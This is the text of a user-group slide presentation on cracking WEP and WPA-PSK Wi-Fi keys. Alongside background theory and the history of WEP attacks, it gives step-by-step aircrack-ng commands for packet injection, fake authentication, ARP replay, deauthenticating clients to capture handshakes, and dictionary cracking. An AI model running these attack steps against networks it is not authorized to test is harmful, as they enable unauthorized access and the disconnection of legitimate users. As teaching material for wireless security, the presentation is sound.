Cracking Wireless

Ryan Curtin
LUG@GT

Ryan Curtin

Cracking Wireless - p. 1

Goals
Goals Setting Up Checking Injection WEP WPA Questions and Comments?

By the end of this presentation (if you stay awake), you will: Understand the different types of wireless keys as well as their advantages and disadvantages Understand the legal ramications of cracking wireless keys Have a basic idea of the theory behind the cracking of each key type Know how to use software to crack wireless keys

Ryan Curtin

Cracking Wireless - p. 2

Setting Up
Goals Setting Up Checking Injection WEP WPA Questions and Comments?

Most of the work can be done with the aircrack-ng package. None of these attacks can be performed if you are using ndiswrapper for your network drivers, or other drivers that do not support promiscuous (or monitor) mode. Starting / stopping promiscuous mode: airmon-ng stop wlan0 airmon-ng check wlan0 airmon-ng start wlan0 <channel>

Ryan Curtin

Cracking Wireless - p. 3

Checking Injection
Goals Setting Up Checking Injection WEP

Before starting, make sure your card can inject packets into an AP! aireplay-ng -9 -e <ESSID> -a <MAC> wlan0

WPA Questions and Comments?

Make sure the percentage of ping replies is not incredibly small, otherwise it may be difcult to collect data.

Ryan Curtin

Cracking Wireless - p. 4

WEP Encryption
Goals Setting Up Checking Injection WEP WEP Encryption Cracking WEP Using aircrack-ng Using aircrack-ng (2) WPA Questions and Comments?

The slide title is not redundant! WEP stands for wired equivalent privacy, not wireless encryption protocol. 64-bit or 128-bit keys Uses RC4 stream cipher with CRC-32 checksum Keys have 24-bit IV (initialization vector) 22 4 (16 million) possible IVs 50% probability of repeated IV after only 5000 packets

Ryan Curtin

Cracking Wireless - p. 5

Cracking WEP
Goals Setting Up Checking Injection WEP WEP Encryption Cracking WEP Using aircrack-ng Using aircrack-ng (2) WPA Questions and Comments?

Different methods have been developed: 2001: Fluhrer, Mantin, and Shamir publish WEP aws and a passive attack 2005: FBI demonstrates WEP cracking in three minutes 2006: Bittau, Handley, and Lackey show that active attacks are possible 2007: Pychine, Tews, and Weinmann optimize active attack (PTW attack)

Ryan Curtin

Cracking Wireless - p. 6

Using aircrack-ng
Goals Setting Up Checking Injection WEP WEP Encryption Cracking WEP Using aircrack-ng Using aircrack-ng (2) WPA Questions and Comments?

1. Gather important data: access point MAC, ESSID, channel airodump-ng wlan0 2. Start capture of IVs airodump-ng -c <channel> -bssid <MAC> -w <outputfile> wlan0 Leave this running! You want to capture around 50k IVs to ensure success (maybe more) 3. Fake authentication with AP aireplay-ng -1 0 -e <ESSID> -a <MAC> wlan0

Ryan Curtin

Cracking Wireless - p. 7

Using aircrack-ng (2)

Goals Setting Up Checking Injection WEP WEP Encryption Cracking WEP Using aircrack-ng Using aircrack-ng (2) WPA Questions and Comments?

4 Reinject ARP packets to get more IVs aireplay-ng -3 -b <MAC> wlan0 Run until you have a substantial number of IVs (in your airodump-ng process) 5 Crack the key! FMS attacks (slow): aircrack-ng -f 1 -F <capture>.cap PTW attacks (fast!): aircrack-ng -P 2 <capture>.cap

Ryan Curtin

Cracking Wireless - p. 8

WPA Encryption
Goals Setting Up Checking Injection WEP WPA WPA Encryption Cracking WPA-PSK Using aircrack-ng Rainbow Tables Questions and Comments?

WPA with TKIP appeared as an interim solution to the WEP problem while 802.11i was prepared; 802.11i is WPA2. WPA: Wi-Fi Protected Access TKIP: Temporal Key Integrity Protocol TKIP also uses RC4 cipher (for legacy WEP hardware) Use AES instead if possible! IV length increased to 48 bits WPA-PSK (pre-shared key): common consumer environment setup

Ryan Curtin

Cracking Wireless - p. 9

Cracking WPA-PSK
Goals Setting Up Checking Injection WEP WPA WPA Encryption Cracking WPA-PSK Using aircrack-ng Rainbow Tables Questions and Comments?

The WPA PSK initialization process is reproducible!

Therefore, we must capture a WPA handshake and then try to replicate it.

Ryan Curtin

Cracking Wireless - p. 10

Using aircrack-ng
Goals Setting Up Checking Injection WEP WPA WPA Encryption Cracking WPA-PSK Using aircrack-ng Rainbow Tables Questions and Comments?

1. Gather important data: access point MAC, ESSID, channel; optional: ESSID of connected client airodump-ng wlan0 2. Start capture of handshakes airodump-ng -c <channel> -bssid <MAC> -w <outputfile> wlan0 Leave this running! Watch for WPA handshake: xx:xx:xx:xx:xx:xx 3. (Optional) Fake deauthentication of client to trigger handshake aireplay-ng -0 1 -a <AP MAC> -c <client MAC> wlan0 Watch for successful ACK in program output 4. Brute-force attack saved handshake aircrack-ng -w <dictionary> -b <MAC> <output capture>

Ryan Curtin

Cracking Wireless - p. 11

Rainbow Tables
Goals Setting Up Checking Injection WEP WPA WPA Encryption Cracking WPA-PSK Using aircrack-ng Rainbow Tables Questions and Comments?

Rainbow Tables: a giant collection of potential common passphrases Available from: Church of Wi Rainbow Tables: http://www.renderlab.net/projects/WPA-tables/ The Schmoo Group: http://rainbowtables.shmoo.com/ Google Search: http://www.google.com/#q=wpa+rainbow+tables

Ryan Curtin

Cracking Wireless - p. 12

Questions and Comments?

Goals Setting Up Checking Injection WEP WPA Questions and Comments? Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 13